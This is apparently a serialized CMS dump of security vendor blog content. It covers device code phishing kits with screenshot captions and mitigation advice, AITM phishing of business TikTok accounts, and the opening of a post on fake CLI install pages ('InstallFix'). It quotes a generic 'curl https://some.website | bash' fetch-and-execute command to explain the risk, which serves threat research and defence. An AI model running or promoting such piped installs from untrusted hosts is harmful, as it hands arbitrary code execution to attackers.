implementation.",{"url":6501,"width":6471,"height":6502},"https://images.ctfassets.net/y1cdw1ablpvd/1J3fOSmUPF8f3FlcwYFoGe/5eff8c1a892f870d1488d6a0f38da03c/image12.png",591,{"sys":6504,"__typename":6482,"title":3964,"arcadeDemoUrl":6505,"playText":6485},{"id":4282},"https://demo.arcade.software/zB6dqehj1lbnB2dur9lB?embed",{"sys":6507,"__typename":6404,"title":6508,"caption":6508,"layoutMode":118,"file":6509},{"id":4707},"SHAREFILE 
kit.",{"url":6510,"width":6471,"height":6511},"https://images.ctfassets.net/y1cdw1ablpvd/1iKelffs399PIIBedgnqmu/64a40d1ad7f69f966665f44c52e0817b/image1.png",1500,{"sys":6513,"__typename":6404,"title":6514,"caption":6514,"layoutMode":118,"file":6515},{"id":4858},"CLURE kit.",{"url":6516,"width":6517,"height":262},"https://images.ctfassets.net/y1cdw1ablpvd/6OWX6ynZ92THYXrFMz3HoS/999a86ab35d6711b537e1234d8b5860e/image3.png",1600,{"sys":6519,"__typename":6404,"title":6520,"caption":118,"layoutMode":118,"file":6521},{"id":5022},"LINKID landing page requires an email before serving the payload.",{"url":6522,"width":6471,"height":6523},"https://images.ctfassets.net/y1cdw1ablpvd/5XAibmWt8HDGbpOC9n1DEk/d4bcb1006d82116dff5865f5b911bc88/image9.png",1049,{"sys":6525,"__typename":6404,"title":6526,"caption":6526,"layoutMode":118,"file":6527},{"id":5180},"AUTHOV kit. Notably uses a popup like prod EvilTokens.",{"url":6528,"width":6471,"height":6529},"https://images.ctfassets.net/y1cdw1ablpvd/4wKaHuSRfMXvi056r88u0b/e77feca260fe5ceb07ea7a080a09148f/image8.png",1128,{"sys":6531,"__typename":6482,"title":6532,"arcadeDemoUrl":6533,"playText":6485},{"id":5344},"DOCUPOLL DCP Kit","https://demo.arcade.software/Wv84a7Vziha9RwTdctvg?embed",{"sys":6535,"__typename":6404,"title":6536,"caption":6536,"layoutMode":118,"file":6537},{"id":5507},"FLOW_TOKEN kit. Notably uses a popup like prod EvilTokens.",{"url":6538,"width":6471,"height":6529},"https://images.ctfassets.net/y1cdw1ablpvd/4Bvbx5dwwBTOvAzULbnhIF/2d676145af0648b1e6f43b624af3ffbc/image7.png",{"sys":6540,"__typename":6404,"title":6541,"caption":6541,"layoutMode":118,"file":6542},{"id":5619},"PAPRIKA kit.",{"url":6543,"width":6471,"height":6544},"https://images.ctfassets.net/y1cdw1ablpvd/2XqwbTyGXRBaH6OM0t9moI/107cd701784fe8eed96eea2b9c09731a/image5.png",727,{"sys":6546,"__typename":6404,"title":6547,"caption":6547,"layoutMode":118,"file":6548},{"id":5730},"DCSTATUS kit. 
",{"url":6549,"width":6471,"height":6511},"https://images.ctfassets.net/y1cdw1ablpvd/1zKQp6Wi0ckDZMLHBriU2Y/7d1c7c348407dcbde2eb94551baca7f5/image14.png",{"sys":6551,"__typename":6371,"content":6552,"name":6563,"title":118},{"id":5747},{"json":6553},{"data":6554,"content":6555,"nodeType":1259},{},[6556],{"data":6557,"content":6558,"nodeType":1258},{},[6559],{"data":6560,"marks":6561,"value":6562,"nodeType":1257},{},[],"Our suspicion is that this was a one-off — potentially for a red team exercise — rather than representative of a more widely used kit.","DCP IB 4",{"sys":6565,"__typename":6404,"title":6566,"caption":6566,"layoutMode":118,"file":6567},{"id":5886},"DOLCE kit.",{"url":6568,"width":6471,"height":6569},"https://images.ctfassets.net/y1cdw1ablpvd/6iUfj8vMymi2c7lZxj006n/88b8066e6bea9fa7a81bd6b546264796/image16.png",728,{"sys":6571,"__typename":6404,"title":6572,"caption":6572,"layoutMode":118,"file":6573},{"id":5932},"Device code phishing attack chain.",{"url":6574,"width":6471,"height":6575},"https://images.ctfassets.net/y1cdw1ablpvd/60e9ErrL8tp3xtoer4gNUl/83899c207f61fdd9ff8aad0e1001030d/image2.png",1275,{"sys":6577,"__typename":6371,"content":6578,"name":6589,"title":118},{"id":5982},{"json":6579},{"nodeType":1259,"data":6580,"content":6581},{},[6582],{"nodeType":1258,"data":6583,"content":6584},{},[6585],{"nodeType":1257,"value":6586,"marks":6587,"data":6588},"One of the key limitations of early device code phishing was that the code was being sent directly over email (as in the Russia-linked campaigns in 2024-5). This meant that the code would expire unless used immediately, requiring highly engaged social engineering to pull off. To get around this, modern device code phishing pages are continuously polling for fresh codes via API. This arguably makes them more discoverable than simply providing the code and instructions in a direct message, but is way more scalable for the attacker. 
",[],{},"DCP IB 5",{"sys":6591,"__typename":6371,"content":6592,"name":6616,"title":118},{"id":6029},{"json":6593},{"nodeType":1259,"data":6594,"content":6595},{},[6596],{"nodeType":1258,"data":6597,"content":6598},{},[6599,6603,6612],{"nodeType":1257,"value":6600,"marks":6601,"data":6602},"These legacy scopes were abused in the Russia-linked ",[],{},{"nodeType":1364,"data":6604,"content":6606},{"uri":6605},"https://pushsecurity.com/blog/consentfix/",[6607],{"nodeType":1257,"value":6608,"marks":6609,"data":6611},"ConsentFix",[6610],{"type":1372},{},{"nodeType":1257,"value":6613,"marks":6614,"data":6615}," campaign (a hybrid of ClickFix-style social engineering with OAuth abuse) reported by Push researchers. This created additional detection challenges as logging of activity against these scopes is not enabled by default. ",[],{},"DCP IB 6",{"sys":6618,"__typename":6371,"content":6619,"name":6643,"title":118},{"id":6245},{"json":6620},{"nodeType":1259,"data":6621,"content":6622},{},[6623],{"nodeType":1258,"data":6624,"content":6625},{},[6626,6630,6639],{"nodeType":1257,"value":6627,"marks":6628,"data":6629},"Another Microsoft option is to prevent users from signing into first-party apps by ",[],{},{"nodeType":1364,"data":6631,"content":6633},{"uri":6632},"https://msendpointmgr.com/2026/01/08/consentfix-quickfix/",[6634],{"nodeType":1257,"value":6635,"marks":6636,"data":6638},"pre-creating service principals for apps and requiring user assignment",[6637],{"type":1372},{},{"nodeType":1257,"value":6640,"marks":6641,"data":6642}," (also an option to mitigate broader OAuth attacks, including ConsentFix). 
This can limit which users can authenticate to specific apps without approval, but needs to be done for every first-party app deemed a risk.",[],{},"DCP IB 7",{"sys":6645,"__typename":6404,"title":6646,"caption":6647,"layoutMode":118,"file":6648},{"id":6303},"DCP warning banner","Users visiting a device code login page will be required to click through a warning banner, emitting a webhook event.",{"url":6649,"width":6650,"height":6651},"https://images.ctfassets.net/y1cdw1ablpvd/2Gtct2qofWtLLVi31Pk8NY/616e56fc4fa7dcb905a0a3a1ca28709b/image17.png",1367,859,"content:blog:device-code-phishing.json","json","content","blog/device-code-phishing.json","blog/device-code-phishing",{"_path":6658,"_dir":1242,"_draft":6,"_partial":6,"_locale":31,"sys":6659,"ogImage":118,"summary":6662,"title":6673,"subtitle":118,"metaTitle":6674,"synopsis":6675,"hashTags":118,"publishedDate":6676,"slug":6677,"tagsCollection":6678,"relatedBlogPostsCollection":6684,"authorsCollection":9153,"content":9157,"_id":9836,"_type":6653,"_source":6654,"_file":9837,"_stem":9838,"_extension":6653},"/blog/tiktok-phishing",{"id":6660,"publishedAt":6661},"1iOnp8gcu1tEUvkqOZsdFd","2026-03-26T07:59:36.622Z",{"json":6663},{"data":6664,"content":6665,"nodeType":1259},{},[6666],{"data":6667,"content":6668,"nodeType":1258},{},[6669],{"data":6670,"marks":6671,"value":6672,"nodeType":1257},{},[],"We’ve identified a new wave of AITM phishing pages designed to hijack TikTok accounts. This seems like a weird target at first glance, but TikTok accounts are ripe for abuse in malvertising scams. 
","Attackers are now targeting business TikTok accounts using session-stealing phishing kits","Business TikTok accounts targeted with AITM phishing kits","Investigating a new wave of AITM phishing pages designed to hijack TikTok accounts.","2026-03-26T00:00:00.000Z","tiktok-phishing",{"items":6679},[6680,6682],{"sys":6681,"name":1270},{"id":1269},{"sys":6683,"name":1274},{"id":1273},{"items":6685},[6686,7514,8536],{"__typename":1278,"sys":6687,"content":6688,"title":2252,"synopsis":2253,"hashTags":118,"publishedDate":2254,"slug":2255,"tagsCollection":7504,"authorsCollection":7510},{"id":1280},{"json":6689},{"nodeType":1259,"data":6690,"content":6691},{},[6692,6698,6704,6710,6713,6720,6726,6732,6737,6743,6748,6764,6770,6780,6783,6790,6796,6809,6815,6825,6830,6833,6840,6847,6852,6860,6876,6884,6890,6898,6913,6921,6927,6935,6961,6969,6975,6983,6999,7004,7012,7018,7026,7059,7062,7069,7077,7093,7101,7107,7115,7141,7146,7154,7160,7165,7168,7175,7183,7189,7240,7245,7248,7255,7263,7269,7274,7277,7284,7290,7296,7356,7362,7417,7423,7426,7433,7439,7445,7450,7453,7460,7466,7472,7478],{"nodeType":1258,"data":6693,"content":6694},{},[6695],{"nodeType":1257,"value":1289,"marks":6696,"data":6697},[],{},{"nodeType":1258,"data":6699,"content":6700},{},[6701],{"nodeType":1257,"value":1296,"marks":6702,"data":6703},[],{},{"nodeType":1258,"data":6705,"content":6706},{},[6707],{"nodeType":1257,"value":1303,"marks":6708,"data":6709},[],{},{"nodeType":1307,"data":6711,"content":6712},{},[],{"nodeType":1311,"data":6714,"content":6715},{},[6716],{"nodeType":1257,"value":1315,"marks":6717,"data":6719},[6718],{"type":1318},{},{"nodeType":1258,"data":6721,"content":6722},{},[6723],{"nodeType":1257,"value":1324,"marks":6724,"data":6725},[],{},{"nodeType":1258,"data":6727,"content":6728},{},[6729],{"nodeType":1257,"value":1331,"marks":6730,"data":6731},[],{},{"nodeType":1335,"data":6733,"content":6736},{"target":6734},{"sys":6735},{"id":1339,"type":1340,"linkType":1341},[],{"nodeType":1258,"data"
:6738,"content":6739},{},[6740],{"nodeType":1257,"value":1347,"marks":6741,"data":6742},[],{},{"nodeType":1335,"data":6744,"content":6747},{"target":6745},{"sys":6746},{"id":1354,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":6749,"content":6750},{},[6751,6754,6761],{"nodeType":1257,"value":1360,"marks":6752,"data":6753},[],{},{"nodeType":1364,"data":6755,"content":6756},{"uri":1366},[6757],{"nodeType":1257,"value":1369,"marks":6758,"data":6760},[6759],{"type":1372},{},{"nodeType":1257,"value":1375,"marks":6762,"data":6763},[],{},{"nodeType":1258,"data":6765,"content":6766},{},[6767],{"nodeType":1257,"value":1382,"marks":6768,"data":6769},[],{},{"nodeType":1258,"data":6771,"content":6772},{},[6773,6776],{"nodeType":1257,"value":1389,"marks":6774,"data":6775},[],{},{"nodeType":1257,"value":1393,"marks":6777,"data":6779},[6778],{"type":1318},{},{"nodeType":1307,"data":6781,"content":6782},{},[],{"nodeType":1311,"data":6784,"content":6785},{},[6786],{"nodeType":1257,"value":1404,"marks":6787,"data":6789},[6788],{"type":1318},{},{"nodeType":1258,"data":6791,"content":6792},{},[6793],{"nodeType":1257,"value":1412,"marks":6794,"data":6795},[],{},{"nodeType":1258,"data":6797,"content":6798},{},[6799,6802,6806],{"nodeType":1257,"value":1419,"marks":6800,"data":6801},[],{},{"nodeType":1257,"value":1423,"marks":6803,"data":6805},[6804],{"type":1318},{},{"nodeType":1257,"value":1428,"marks":6807,"data":6808},[],{},{"nodeType":1258,"data":6810,"content":6811},{},[6812],{"nodeType":1257,"value":1435,"marks":6813,"data":6814},[],{},{"nodeType":1258,"data":6816,"content":6817},{},[6818,6821],{"nodeType":1257,"value":1442,"marks":6819,"data":6820},[],{},{"nodeType":1257,"value":1446,"marks":6822,"data":6824},[6823],{"type":1318},{},{"nodeType":1335,"data":6826,"content":6829},{"target":6827},{"sys":6828},{"id":1454,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":6831,"content":6832},{},[],{"nodeType":1311,"data":6834,"content":6835},{},[6836],{"nodeType":1257,"valu
e":1463,"marks":6837,"data":6839},[6838],{"type":1318},{},{"nodeType":1468,"data":6841,"content":6842},{},[6843],{"nodeType":1257,"value":1472,"marks":6844,"data":6846},[6845],{"type":1318},{},{"nodeType":1335,"data":6848,"content":6851},{"target":6849},{"sys":6850},{"id":1480,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":6853,"content":6854},{},[6855],{"nodeType":1257,"value":1486,"marks":6856,"data":6859},[6857,6858],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":6861,"content":6862},{},[6863,6866,6873],{"nodeType":1257,"value":1495,"marks":6864,"data":6865},[],{},{"nodeType":1364,"data":6867,"content":6868},{"uri":1500},[6869],{"nodeType":1257,"value":1503,"marks":6870,"data":6872},[6871],{"type":1372},{},{"nodeType":1257,"value":1508,"marks":6874,"data":6875},[],{},{"nodeType":1258,"data":6877,"content":6878},{},[6879],{"nodeType":1257,"value":1515,"marks":6880,"data":6883},[6881,6882],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":6885,"content":6886},{},[6887],{"nodeType":1257,"value":1524,"marks":6888,"data":6889},[],{},{"nodeType":1258,"data":6891,"content":6892},{},[6893],{"nodeType":1257,"value":1531,"marks":6894,"data":6897},[6895,6896],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":6899,"content":6900},{},[6901,6904,6910],{"nodeType":1257,"value":1540,"marks":6902,"data":6903},[],{},{"nodeType":1364,"data":6905,"content":6906},{"uri":1545},[6907],{"nodeType":1257,"value":1548,"marks":6908,"data":6909},[],{},{"nodeType":1257,"value":1552,"marks":6911,"data":6912},[],{},{"nodeType":1258,"data":6914,"content":6915},{},[6916],{"nodeType":1257,"value":1559,"marks":6917,"data":6920},[6918,6919],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":6922,"content":6923},{},[6924],{"nodeType":1257,"value":1568,"marks":6925,"data":6926},[],{},{"nodeType":1258,"data":6928,"content":6929},{},[6930],{"nodeType":1257,"value":1575,"marks":6931,"data":6934},[6932,6933],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":6936,"conten
t":6937},{},[6938,6941,6948,6951,6958],{"nodeType":1257,"value":1584,"marks":6939,"data":6940},[],{},{"nodeType":1364,"data":6942,"content":6943},{"uri":1589},[6944],{"nodeType":1257,"value":1592,"marks":6945,"data":6947},[6946],{"type":1372},{},{"nodeType":1257,"value":1597,"marks":6949,"data":6950},[],{},{"nodeType":1364,"data":6952,"content":6953},{"uri":1602},[6954],{"nodeType":1257,"value":1605,"marks":6955,"data":6957},[6956],{"type":1372},{},{"nodeType":1257,"value":1610,"marks":6959,"data":6960},[],{},{"nodeType":1258,"data":6962,"content":6963},{},[6964],{"nodeType":1257,"value":1617,"marks":6965,"data":6968},[6966,6967],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":6970,"content":6971},{},[6972],{"nodeType":1257,"value":1626,"marks":6973,"data":6974},[],{},{"nodeType":1258,"data":6976,"content":6977},{},[6978],{"nodeType":1257,"value":1633,"marks":6979,"data":6982},[6980,6981],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":6984,"content":6985},{},[6986,6989,6996],{"nodeType":1257,"value":1642,"marks":6987,"data":6988},[],{},{"nodeType":1364,"data":6990,"content":6991},{"uri":1602},[6992],{"nodeType":1257,"value":1605,"marks":6993,"data":6995},[6994],{"type":1372},{},{"nodeType":1257,"value":1653,"marks":6997,"data":6998},[],{},{"nodeType":1335,"data":7000,"content":7003},{"target":7001},{"sys":7002},{"id":1660,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":7005,"content":7006},{},[7007],{"nodeType":1257,"value":1666,"marks":7008,"data":7011},[7009,7010],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":7013,"content":7014},{},[7015],{"nodeType":1257,"value":1675,"marks":7016,"data":7017},[],{},{"nodeType":1258,"data":7019,"content":7020},{},[7021],{"nodeType":1257,"value":1682,"marks":7022,"data":7025},[7023,7024],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":7027,"content":7028},{},[7029,7032,7038,7041,7047,7050,7056],{"nodeType":1257,"value":1691,"marks":7030,"data":7031},[],{},{"nodeType":1364,"data":7033,"content
":7034},{"uri":1696},[7035],{"nodeType":1257,"value":1699,"marks":7036,"data":7037},[],{},{"nodeType":1257,"value":1703,"marks":7039,"data":7040},[],{},{"nodeType":1364,"data":7042,"content":7043},{"uri":1708},[7044],{"nodeType":1257,"value":1711,"marks":7045,"data":7046},[],{},{"nodeType":1257,"value":1715,"marks":7048,"data":7049},[],{},{"nodeType":1364,"data":7051,"content":7052},{"uri":1720},[7053],{"nodeType":1257,"value":1723,"marks":7054,"data":7055},[],{},{"nodeType":1257,"value":1727,"marks":7057,"data":7058},[],{},{"nodeType":1307,"data":7060,"content":7061},{},[],{"nodeType":1468,"data":7063,"content":7064},{},[7065],{"nodeType":1257,"value":1737,"marks":7066,"data":7068},[7067],{"type":1318},{},{"nodeType":1258,"data":7070,"content":7071},{},[7072],{"nodeType":1257,"value":1745,"marks":7073,"data":7076},[7074,7075],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":7078,"content":7079},{},[7080,7083,7090],{"nodeType":1257,"value":1754,"marks":7081,"data":7082},[],{},{"nodeType":1364,"data":7084,"content":7085},{"uri":1759},[7086],{"nodeType":1257,"value":1762,"marks":7087,"data":7089},[7088],{"type":1372},{},{"nodeType":1257,"value":1767,"marks":7091,"data":7092},[],{},{"nodeType":1258,"data":7094,"content":7095},{},[7096],{"nodeType":1257,"value":1774,"marks":7097,"data":7100},[7098,7099],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":7102,"content":7103},{},[7104],{"nodeType":1257,"value":1783,"marks":7105,"data":7106},[],{},{"nodeType":1258,"data":7108,"content":7109},{},[7110],{"nodeType":1257,"value":1790,"marks":7111,"data":7114},[7112,7113],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":7116,"content":7117},{},[7118,7121,7128,7131,7138],{"nodeType":1257,"value":1799,"marks":7119,"data":7120},[],{},{"nodeType":1364,"data":7122,"content":7123},{"uri":1804},[7124],{"nodeType":1257,"value":1807,"marks":7125,"data":7127},[7126],{"type":1372},{},{"nodeType":1257,"value":1812,"marks":7129,"data":7130},[],{},{"nodeType":1364,"data":713
2,"content":7133},{"uri":1817},[7134],{"nodeType":1257,"value":1820,"marks":7135,"data":7137},[7136],{"type":1372},{},{"nodeType":1257,"value":1825,"marks":7139,"data":7140},[],{},{"nodeType":1335,"data":7142,"content":7145},{"target":7143},{"sys":7144},{"id":1832,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":7147,"content":7148},{},[7149],{"nodeType":1257,"value":1838,"marks":7150,"data":7153},[7151,7152],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":7155,"content":7156},{},[7157],{"nodeType":1257,"value":1847,"marks":7158,"data":7159},[],{},{"nodeType":1335,"data":7161,"content":7164},{"target":7162},{"sys":7163},{"id":1854,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":7166,"content":7167},{},[],{"nodeType":1468,"data":7169,"content":7170},{},[7171],{"nodeType":1257,"value":1863,"marks":7172,"data":7174},[7173],{"type":1318},{},{"nodeType":1258,"data":7176,"content":7177},{},[7178],{"nodeType":1257,"value":1871,"marks":7179,"data":7182},[7180,7181],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":7184,"content":7185},{},[7186],{"nodeType":1257,"value":1880,"marks":7187,"data":7188},[],{},{"nodeType":1884,"data":7190,"content":7191},{},[7192,7205,7218],{"nodeType":1888,"data":7193,"content":7194},{},[7195],{"nodeType":1258,"data":7196,"content":7197},{},[7198,7202],{"nodeType":1257,"value":1895,"marks":7199,"data":7201},[7200],{"type":1318},{},{"nodeType":1257,"value":1900,"marks":7203,"data":7204},[],{},{"nodeType":1888,"data":7206,"content":7207},{},[7208],{"nodeType":1258,"data":7209,"content":7210},{},[7211,7215],{"nodeType":1257,"value":1910,"marks":7212,"data":7214},[7213],{"type":1318},{},{"nodeType":1257,"value":1915,"marks":7216,"data":7217},[],{},{"nodeType":1888,"data":7219,"content":7220},{},[7221],{"nodeType":1258,"data":7222,"content":7223},{},[7224,7228,7231,7237],{"nodeType":1257,"value":1925,"marks":7225,"data":7227},[7226],{"type":1318},{},{"nodeType":1257,"value":1930,"marks":7229,"data":7230},[],{},{"nodeType":
1364,"data":7232,"content":7233},{"uri":1935},[7234],{"nodeType":1257,"value":1938,"marks":7235,"data":7236},[],{},{"nodeType":1257,"value":1942,"marks":7238,"data":7239},[],{},{"nodeType":1335,"data":7241,"content":7244},{"target":7242},{"sys":7243},{"id":1949,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":7246,"content":7247},{},[],{"nodeType":1468,"data":7249,"content":7250},{},[7251],{"nodeType":1257,"value":1958,"marks":7252,"data":7254},[7253],{"type":1318},{},{"nodeType":1258,"data":7256,"content":7257},{},[7258],{"nodeType":1257,"value":1966,"marks":7259,"data":7262},[7260,7261],{"type":1318},{"type":1372},{},{"nodeType":1258,"data":7264,"content":7265},{},[7266],{"nodeType":1257,"value":1975,"marks":7267,"data":7268},[],{},{"nodeType":1335,"data":7270,"content":7273},{"target":7271},{"sys":7272},{"id":1982,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":7275,"content":7276},{},[],{"nodeType":1311,"data":7278,"content":7279},{},[7280],{"nodeType":1257,"value":1991,"marks":7281,"data":7283},[7282],{"type":1318},{},{"nodeType":1258,"data":7285,"content":7286},{},[7287],{"nodeType":1257,"value":1999,"marks":7288,"data":7289},[],{},{"nodeType":1258,"data":7291,"content":7292},{},[7293],{"nodeType":1257,"value":2006,"marks":7294,"data":7295},[],{},{"nodeType":1884,"data":7297,"content":7298},{},[7299,7318,7337],{"nodeType":1888,"data":7300,"content":7301},{},[7302],{"nodeType":1258,"data":7303,"content":7304},{},[7305,7308,7315],{"nodeType":1257,"value":2019,"marks":7306,"data":7307},[],{},{"nodeType":1364,"data":7309,"content":7310},{"uri":2024},[7311],{"nodeType":1257,"value":2027,"marks":7312,"data":7314},[7313],{"type":1372},{},{"nodeType":1257,"value":2032,"marks":7316,"data":7317},[],{},{"nodeType":1888,"data":7319,"content":7320},{},[7321],{"nodeType":1258,"data":7322,"content":7323},{},[7324,7327,7334],{"nodeType":1257,"value":2042,"marks":7325,"data":7326},[],{},{"nodeType":1364,"data":7328,"content":7329},{"uri":2047},[7330],{"nodeType"
:1257,"value":2050,"marks":7331,"data":7333},[7332],{"type":1372},{},{"nodeType":1257,"value":2032,"marks":7335,"data":7336},[],{},{"nodeType":1888,"data":7338,"content":7339},{},[7340],{"nodeType":1258,"data":7341,"content":7342},{},[7343,7346,7353],{"nodeType":1257,"value":2064,"marks":7344,"data":7345},[],{},{"nodeType":1364,"data":7347,"content":7348},{"uri":2069},[7349],{"nodeType":1257,"value":2072,"marks":7350,"data":7352},[7351],{"type":1372},{},{"nodeType":1257,"value":2032,"marks":7354,"data":7355},[],{},{"nodeType":1258,"data":7357,"content":7358},{},[7359],{"nodeType":1257,"value":2083,"marks":7360,"data":7361},[],{},{"nodeType":1884,"data":7363,"content":7364},{},[7365,7378,7391,7404],{"nodeType":1888,"data":7366,"content":7367},{},[7368],{"nodeType":1258,"data":7369,"content":7370},{},[7371,7375],{"nodeType":1257,"value":2096,"marks":7372,"data":7374},[7373],{"type":1318},{},{"nodeType":1257,"value":2101,"marks":7376,"data":7377},[],{},{"nodeType":1888,"data":7379,"content":7380},{},[7381],{"nodeType":1258,"data":7382,"content":7383},{},[7384,7388],{"nodeType":1257,"value":2111,"marks":7385,"data":7387},[7386],{"type":1318},{},{"nodeType":1257,"value":2116,"marks":7389,"data":7390},[],{},{"nodeType":1888,"data":7392,"content":7393},{},[7394],{"nodeType":1258,"data":7395,"content":7396},{},[7397,7401],{"nodeType":1257,"value":2126,"marks":7398,"data":7400},[7399],{"type":1318},{},{"nodeType":1257,"value":2131,"marks":7402,"data":7403},[],{},{"nodeType":1888,"data":7405,"content":7406},{},[7407],{"nodeType":1258,"data":7408,"content":7409},{},[7410,7414],{"nodeType":1257,"value":2141,"marks":7411,"data":7413},[7412],{"type":1318},{},{"nodeType":1257,"value":2146,"marks":7415,"data":7416},[],{},{"nodeType":1258,"data":7418,"content":7419},{},[7420],{"nodeType":1257,"value":2153,"marks":7421,"data":7422},[],{},{"nodeType":1307,"data":7424,"content":7425},{},[],{"nodeType":1311,"data":7427,"content":7428},{},[7429],{"nodeType":1257,"value":2163,"marks":7430
,"data":7432},[7431],{"type":1318},{},{"nodeType":1258,"data":7434,"content":7435},{},[7436],{"nodeType":1257,"value":2171,"marks":7437,"data":7438},[],{},{"nodeType":1258,"data":7440,"content":7441},{},[7442],{"nodeType":1257,"value":2178,"marks":7443,"data":7444},[],{},{"nodeType":1335,"data":7446,"content":7449},{"target":7447},{"sys":7448},{"id":2185,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":7451,"content":7452},{},[],{"nodeType":1311,"data":7454,"content":7455},{},[7456],{"nodeType":1257,"value":2194,"marks":7457,"data":7459},[7458],{"type":1318},{},{"nodeType":1258,"data":7461,"content":7462},{},[7463],{"nodeType":1257,"value":2202,"marks":7464,"data":7465},[],{},{"nodeType":1258,"data":7467,"content":7468},{},[7469],{"nodeType":1257,"value":2209,"marks":7470,"data":7471},[],{},{"nodeType":1258,"data":7473,"content":7474},{},[7475],{"nodeType":1257,"value":2216,"marks":7476,"data":7477},[],{},{"nodeType":1258,"data":7479,"content":7480},{},[7481,7484,7491,7494,7501],{"nodeType":1257,"value":2223,"marks":7482,"data":7483},[],{},{"nodeType":1364,"data":7485,"content":7486},{"uri":2228},[7487],{"nodeType":1257,"value":2231,"marks":7488,"data":7490},[7489],{"type":1372},{},{"nodeType":1257,"value":2236,"marks":7492,"data":7493},[],{},{"nodeType":1364,"data":7495,"content":7496},{"uri":2241},[7497],{"nodeType":1257,"value":2244,"marks":7498,"data":7500},[7499],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":7502,"data":7503},[],{},{"items":7505},[7506,7508],{"sys":7507,"name":1270},{"id":1269},{"sys":7509,"name":1274},{"id":1273},{"items":7511},[7512],{"fullName":2265,"firstName":2266,"jobTitle":2267,"profilePicture":7513},{"url":2269},{"__typename":1278,"sys":7515,"content":7517,"title":8518,"synopsis":8519,"hashTags":118,"publishedDate":8520,"slug":8521,"tagsCollection":8522,"authorsCollection":8528},{"id":7516},"7bG71Eo43crbIHKzczooVS",{"json":7518},{"nodeType":1259,"data":7519,"content":7520},{},[7521,7527,7534,7541,7549,7565,7571,7574,7582
,7589,7596,7603,7610,7617,7624,7631,7638,7644,7650,7657,7663,7670,7677,7683,7689,7695,7701,7721,7733,7740,7746,7753,7760,7793,7800,7808,7815,7821,7828,7834,7841,7859,7866,7869,7877,7884,7979,7986,7992,7995,8003,8010,8017,8024,8061,8064,8071,8089,8096,8104,8314,8322,8355,8363,8372,8378,8386,8393,8401,8412,8420,8426,8434,8445,8453,8461,8469,8477,8484,8492,8503,8510],{"nodeType":1335,"data":7522,"content":7526},{"target":7523},{"sys":7524},{"id":7525,"type":1340,"linkType":1341},"38JCcRQe2tN9ooHGwreoF5",[],{"nodeType":1258,"data":7528,"content":7529},{},[7530],{"nodeType":1257,"value":7531,"marks":7532,"data":7533},"There was a time, not that long ago, when pasting a command from a website straight into your terminal was something you’d only try once before some grizzled senior engineer beat it out of you. That’s because you’re effectively handing a website a blank cheque to execute whatever it wants on your system.",[],{},{"nodeType":1258,"data":7535,"content":7536},{},[7537],{"nodeType":1257,"value":7538,"marks":7539,"data":7540},"But somehow, it’s now the default. Homebrew, Rust, nvm, Bun, oh-my-zsh and hundreds of the most widely used developer tools on the planet now ship with the same instructions. Copy a “curl to bash” ( curl https://some.website | bash) one-liner from a website, paste it into your terminal, and hit enter. The entire security model boils down to \"trust the domain.\" And with AI adoption encouraging more non-technical users to work with the kind of tools that only devs used to use, this suddenly becomes a threat to a much larger, less security conscious pool of users.",[],{},{"nodeType":1258,"data":7542,"content":7543},{},[7544],{"nodeType":1257,"value":7545,"marks":7546,"data":7548},"It’s not hard to see how attackers can exploit this. 
",[7547],{"type":1318},{},{"nodeType":1258,"data":7550,"content":7551},{},[7552,7556,7561],{"nodeType":1257,"value":7553,"marks":7554,"data":7555},"We're tracking a technique we're calling ",[],{},{"nodeType":1257,"value":7557,"marks":7558,"data":7560},"InstallFix",[7559],{"type":1318},{},{"nodeType":1257,"value":7562,"marks":7563,"data":7564},": a clever social engineering attack where threat actors clone the installation pages of legitimate CLI tools and present victims with malicious install commands disguised as the real thing. In each case, the mechanic is the same: the victim sees what looks like a familiar install command, copies it, pastes it, and runs it. Except the command they run is not the one they expected.",[],{},{"nodeType":1335,"data":7566,"content":7570},{"target":7567},{"sys":7568},{"id":7569,"type":1340,"linkType":1341},"6VMkuQkU5L0vObxIojI1Xw",[],{"nodeType":1307,"data":7572,"content":7573},{},[],{"nodeType":1311,"data":7575,"content":7576},{},[7577],{"nodeType":1257,"value":7578,"marks":7579,"data":7581},"InstallFix Claude Code campaign teardown",[7580],{"type":1318},{},{"nodeType":1258,"data":7583,"content":7584},{},[7585],{"nodeType":1257,"value":7586,"marks":7587,"data":7588},"All you need to make this attack work is a popular tool you can impersonate. Naturally, this makes trendy AI tools a popular choice. Then, you just need to boost your lure to deliver it to unsuspecting victims via search engine. The most common way of doing this is through sponsored results — aka malvertising. ",[],{},{"nodeType":1258,"data":7590,"content":7591},{},[7592],{"nodeType":1257,"value":7593,"marks":7594,"data":7595},"In the recent examples identified by Push researchers, attackers have simply cloned the installation webpages for tools and updated the installation instructions with malicious commands. 
